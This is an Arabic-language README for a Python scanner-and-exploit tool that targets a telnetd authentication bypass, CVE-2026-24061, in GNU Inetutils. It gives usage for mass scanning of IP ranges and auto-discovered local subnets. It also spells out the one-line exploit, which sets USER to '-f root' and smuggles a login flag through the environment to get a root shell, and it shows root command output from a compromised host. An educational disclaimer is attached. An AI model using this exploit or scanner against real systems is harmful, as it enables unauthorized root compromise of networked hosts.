
# ماسح ضوئي مبني على بايثون يكتشف ويستغل ثغرة تجاوز المصادقة CVE-2026-24061 في خدمة telnetd، مما يتيح الوصول إلى قشرة الجذر (root shell) على خدمات GNU Inetutils الضعيفة.
أداة مبنية بلغة Python لفحص واستغلال ثغرة CVE-2026-24061 في خدمات telnetd الخاصة بـ GNU Inetutils. تقوم هذه الأداة بفحص عناوين IP أو الشبكات بحثًا عن خدمات telnetd الضعيفة التي تسمح بتجاوز المصادقة مما يؤدي إلى الوصول إلى صلاحيات الجذر (root shell).
هذا البرنامج مقدم لأغراض تعليمية واختبارات أمنية مصرح بها فقط.
تم تطوير هذا التطبيق لأغراض تعليمية فقط لتوضيح الثغرات الأمنية وللمساعدة في الاختبارات الأمنية والأبحاث المصرح بها.
هذا البرنامج مقدم "كما هو"، دون أي ضمان من أي نوع، صريح أو ضمني، بما في ذلك على سبيل المثال لا الحصر ضمانات القابلية للتسويق، والملاءمة لغرض معين، وعدم التعدي على الحقوق. لا يضمن المؤلفون والمساهمون أن البرنامج سيكون خاليًا من الأخطاء أو آمنًا أو فعالاً. قد يحتوي البرنامج على أخطاء برمجية أو عيوب أخرى.
تقع جميع المسؤولية والتبعات القانونية لاستخدام هذا البرنامج بالكامل على عاتق المستخدم. لا يتحمل المؤلفون أو المساهمون أو الموزعون لهذا البرنامج أي مسؤولية عن أي أضرار أو خسائر أو عواقب قانونية ناتجة عن استخدام أو إساءة استخدام أو عدم القدرة على استخدام هذا البرنامج.
يجب استخدام هذه الأداة فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وقد يؤدي إلى ملاحقة جنائية.
لا يضمن المؤلفون عدم:
باستخدامك لهذا البرنامج، فإنك تقر بأنك قرأت وفهمت ووافقت على الالتزام بهذه الشروط. إذا كنت لا توافق، فلا تستخدم هذا البرنامج.
تم التطوير بواسطة: Cuma KURT
البريد الإلكتروني: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061: تسمح خدمة telnetd الخاصة بـ GNU Inetutils حتى الإصدار 2.7 بتجاوز المصادقة عن بُعد عبر قيمة -f root لمتغير البيئة USER.
درجة CVSS: 9.8 (حرجة)
المرجع: NVD CVE-2026-24061
telnet (مثبت مسبقًا عادةً على Linux/macOS)pip3 install -r requirements.txt
ملاحظة: معظم التبعيات جزء من المكتبة القياسية للغة Python. تعمل الأداة مباشرة مع Python 3.6+.
# فحص عنوان IP واحد
python3 tscan.py 192.168.1.1
# فحص شبكة CIDR
python3 tscan.py 192.168.1.0/24
# الفحص بمنفذ مخصص
python3 tscan.py -p 2323 192.168.1.1
# فحص أهداف من ملف
python3 tscan.py targets.txt
# فحص عناوين IP متعددة
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# فحص شبكات CIDR متعددة
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# زيادة عدد الخيوط لفحص أسرع (100 خيط)
python3 tscan.py -t 100 192.168.1.0/24
# زيادة المهلة الزمنية للشبكات البطيئة
python3 tscan.py --timeout 10 192.168.1.0/24
# الجمع بين الاثنين لفحص الشبكات الكبيرة
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# اكتشاف وفحص جميع الشبكات الفرعية تلقائيًا من جدول توجيه النظام
python3 tscan.py --auto
# أو باستخدام الصيغة المختصرة:
python3 tscan.py -a
# الاكتشاف التلقائي بمنفذ مخصص
python3 tscan.py --auto -p 2323
# أو:
python3 tscan.py -a -p 2323
# الاكتشاف التلقائي بعدد خيوط مرتفع
python3 tscan.py --auto -t 200
# أو:
python3 tscan.py -a -t 200
ملاحظة: يقرأ وضع --auto جدول توجيه النظام باستخدام أمر ip route list أو route -n ويفحص جميع الشبكات الفرعية المكتشفة تلقائيًا.
# مثال 1: فحص سريع للشبكة المحلية
python3 tscan.py 192.168.1.0/24
# مثال 2: فحص سريع بتزامن عالٍ
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# مثال 3: فحص منفذ telnet غير قياسي
python3 tscan.py -p 2323 192.168.1.0/24
# مثال 4: اكتشاف وفحص جميع الشبكات الفرعية المحلية تلقائيًا
python3 tscan.py --auto
# أو:
python3 tscan.py -a
# مثال 5: الاكتشاف التلقائي بإعدادات مخصصة
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# أو:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
positional arguments:
targets عنوان (عناوين) IP أو شبكة (شبكات) CIDR أو مسار (مسارات) ملفات تحتوي على الأهداف
options:
-h, --help عرض رسالة المساعدة هذه والخروج
-p, --port PORT منفذ Telnet للفحص (الافتراضي: 23)
-t, --threads THREADS عدد الخيوط المتزامنة (الافتراضي: 50)
--timeout TIMEOUT مهلة الاتصال بالثواني (الافتراضي: 5)
-v, --verbose إخراج تفصيلي
-a, --auto اكتشاف وفحص جميع الشبكات الفرعية تلقائيًا من جدول توجيه النظام (route -n أو ip route list)
أنشئ ملفًا نصيًا بهدف واحد في كل سطر:
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
الأسطر التي تبدأ بـ # تُعتبر تعليقات ويتم تجاهلها.
توفر الأداة:
تقدم فوري: يعرض النتائج فور اكتشافها
[!] - مضيف ضعيف[~] - المنفذ مفتوح ولكن غير ضعيفتقرير الملخص: يتضمن:
[*] بدء الفحص على 256 هدفًا...
[*] المنفذ: 23، الخيوط: 50، المهلة: 5 ثوانٍ
[*] التقدم: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | مفتوح: 2 | ضعيف: 1
[!] 192.168.1.100:23 - ضعيف
[*] التقدم: [████████████████████████████████████] 100.0% (256/256) | مفتوح: 3 | ضعيف: 1
[+] اكتمل الفحص: تم فحص 256/256 هدفًا
======================================================================
ملخص نتائج الفحص
======================================================================
خدمات telnet المكتشفة: 3
المضيفون الضعفاء: 1
[!] المضيفون الضعفاء:
● 192.168.1.100:23
المخرجات: uid=0(root) gid=0(root) groups=0(root)...
[~] خدمات telnet المكتشفة ولكنها غير ضعيفة:
● 192.168.1.101:23
● 192.168.1.102:23
[*] اكتمل الفحص في 12.34 ثانية
USER="-f root"telnet -aتسمح الثغرة بتجاوز المصادقة عن طريق ضبط متغير البيئة USER على -f root:
USER="-f root" telnet -a TARGET_IP [PORT]
يؤدي هذا إلى تفسير telnetd لمتغير USER كعلامة (flag)، متجاوزًا المصادقة ومانحًا وصول الجذر.
telnetip route list أو route -nقم بتثبيت عميل telnet:
# Debian/Ubuntu
sudo apt-get install telnet
# CentOS/RHEL
sudo yum install telnet
# macOS
# مثبت مسبقًا عادةً
--timeout 10هذه الأداة مخصصة لـ: